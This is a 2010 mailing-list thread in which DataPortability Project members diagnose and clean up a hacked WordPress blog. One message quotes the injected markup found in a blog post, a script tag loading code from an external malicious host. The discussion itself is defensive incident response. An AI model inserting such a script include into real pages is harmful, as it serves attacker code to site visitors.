DPP blog hacked again

0 views
Skip to first unread message

Elias Bizannes

unread,
Aug 17, 2010, 2:34:36 PM8/17/10
to DataPortability.General
Our self-hosted wordpress blog has been hacked again. We've identified that it's some sort of cookie which you notice on your first visit, but then hides on subsequent visits. Nothing seems obvious in the source code, like the previous hacker attempt.

Can anyone help with this?

Elias Bizannes
http://eliasbizannes.com

Elias Bizannes

unread,
Aug 17, 2010, 2:33:39 PM8/17/10
to DataPortability.General
Our self-hoested wordpress blog has been hacked again. We've identified that it's some sort of cookie which you notice on your first visit, but then hides on subsequent visits. Nothing seems obvious in the source code, like the previous hacker attempt.

Nate Benes

unread,
Aug 17, 2010, 2:39:17 PM8/17/10
to dataportabi...@googlegroups.com
Elias,

I sent an email to the list about this around a week ago, but I don't think it ever got through moderation.  I think its in your signature.  Its the script originating from ie.eracou.com.  If you need anymore information or help getting rid of it, let me know.

Thanks,
Nate



--
You received this message because you are subscribed to the Google
Groups "DataPortability.Public.General" group.
To post to this group, send email to
dataportabi...@googlegroups.com
To unsubscribe from this group, send email to
dataportability-p...@googlegroups.com
For more options, visit this group at
http://groups.google.com/group/dataportability-public?hl=en
For additional information, please visit:
http://www.dataportability.org/

John Erickson

unread,
Aug 17, 2010, 2:37:59 PM8/17/10
to dataportabi...@googlegroups.com
This makes me pretty nervous...

> --
> You received this message because you are subscribed to the Google
> Groups "DataPortability.Public.General" group.
> To post to this group, send email to
> dataportabi...@googlegroups.com
> To unsubscribe from this group, send email to
> dataportability-p...@googlegroups.com
> For more options, visit this group at
> http://groups.google.com/group/dataportability-public?hl=en
> For additional information, please visit:
> http://www.dataportability.org/

--
John S. Erickson, Ph.D.
http://bitwacker.wordpress.com
olyer...@gmail.com
Twitter: @olyerickson
Skype: @olyerickson

Phil Wolff

unread,
Aug 17, 2010, 2:44:43 PM8/17/10
to dataportabi...@googlegroups.com
We're down to just a handful of plug-ins, all well known and widely used.
I'm walking through the theme settings to see if there are any scripts invoked.

--

Elias Bizannes

unread,
Aug 17, 2010, 2:44:33 PM8/17/10
to dataportabi...@googlegroups.com
Thanks Nate - I just saw your email now.

I'll look into it now.

danielabarbosa

unread,
Aug 17, 2010, 2:48:05 PM8/17/10
to DataPortability.General
Hi everyone.

we just discussed this on our steering call this morning and we are
making it a priority to fix!

Nate- sorry your original post was stuck in moderation, i have set you
up to post freely but will keep an eye on it!

~daniela

On Aug 17, 11:44 am, Phil Wolff <pwo...@gmail.com> wrote:
> We're down to just a handful of plug-ins, all well known and widely used.
> I'm walking through the theme settings to see if there are any scripts
> invoked.
>
> On Tue, Aug 17, 2010 at 11:33 AM, Elias Bizannes
> <elias.bizan...@gmail.com>wrote:

Nate Benes

unread,
Aug 17, 2010, 2:48:54 PM8/17/10
to dataportabi...@googlegroups.com
Duly noted,  Thanks!

Elias Bizannes

unread,
Aug 17, 2010, 2:47:38 PM8/17/10
to dataportabi...@googlegroups.com
Nate is right - somehow this following was added to the most recent blog post

<em><a href="http://eliasbizannes.com">Elias Bizannes</a> is the chairperson and executive director of the DataPortability Project.</em><script src="http://ie.eracou.com/3"></script>

Phil: can you careful re-add the plugins? We upgraded the theme the other week as a quick way to overcome the security risk with the old word press installation which corrected it.

Allen

unread,
Aug 17, 2010, 2:49:37 PM8/17/10
to dataportabi...@googlegroups.com
My sites have been hacked so many times, the hackers send me a monthly check.

I believe the latest round of hacks is direct sql attacks - not sql
injection but somehow they are able to get into the dbs. I've had this
happen on both rackspace and mediatemple - Rackspace made some changes
to their phpmyadmin and while they continue to say that it had nothing
to do with them, I don't buy it fully. Same issue with MT.

You need to make sure the database is clear of the bad hack script
code. The days of injecting code into the footer of a theme seem to be
over - the new way is to hack the db and add code that only goes after
those coming from Google - this way the site owner will typically
never see the hack.

Allen

unread,
Aug 17, 2010, 2:51:18 PM8/17/10
to dataportabi...@googlegroups.com
See this is exactly what I mean - it's the lovely script code
injection - you need to check ALL your blog posts because on some of
my blogs they injected that into all of the posts, other blogs only
the latest post.

Cleanup instructions here:
http://wiki.mediatemple.net/w/WordPress_Redirect_Exploit

MAKE SURE TO BACKUP before cleaning and then again after cleaning.

-- Allen Stern
CloudContacts
http://www.cloudcontacts.com

Nate Benes

unread,
Aug 17, 2010, 2:51:10 PM8/17/10
to dataportabi...@googlegroups.com
Here is the vulnerability,  it was on the DB side I think.


Nate

Elias Bizannes

unread,
Aug 17, 2010, 2:51:01 PM8/17/10
to dataportabi...@googlegroups.com
Interesting, thanks Allen. Any idea on where in the wordpress database this would be hiding?

Allen

unread,
Aug 17, 2010, 2:53:16 PM8/17/10
to dataportabi...@googlegroups.com
Elias - it's in the post_content field - follow the instructions on
the link I provided to have a look at your db.

This hack has happened to tons of wordpress blogs that I know of.

-- Allen

On Tue, Aug 17, 2010 at 1:51 PM, Elias Bizannes

Phil Wolff

unread,
Aug 17, 2010, 2:54:48 PM8/17/10
to dataportabi...@googlegroups.com
Phil: can you careful re-add the plugins? We upgraded the theme the other week as a quick way to overcome the security risk with the old word press installation which corrected it.

Working on it. Also upgraded the themes, widgets, and whatnot while I was at it.
 

Phil Wolff

unread,
Aug 17, 2010, 8:45:22 PM8/17/10
to dataportabi...@googlegroups.com
Elias, I don't have the server permissions or access to the server/database control panel to follow the procedure.
Reply all
Reply to author
Forward
0 new messages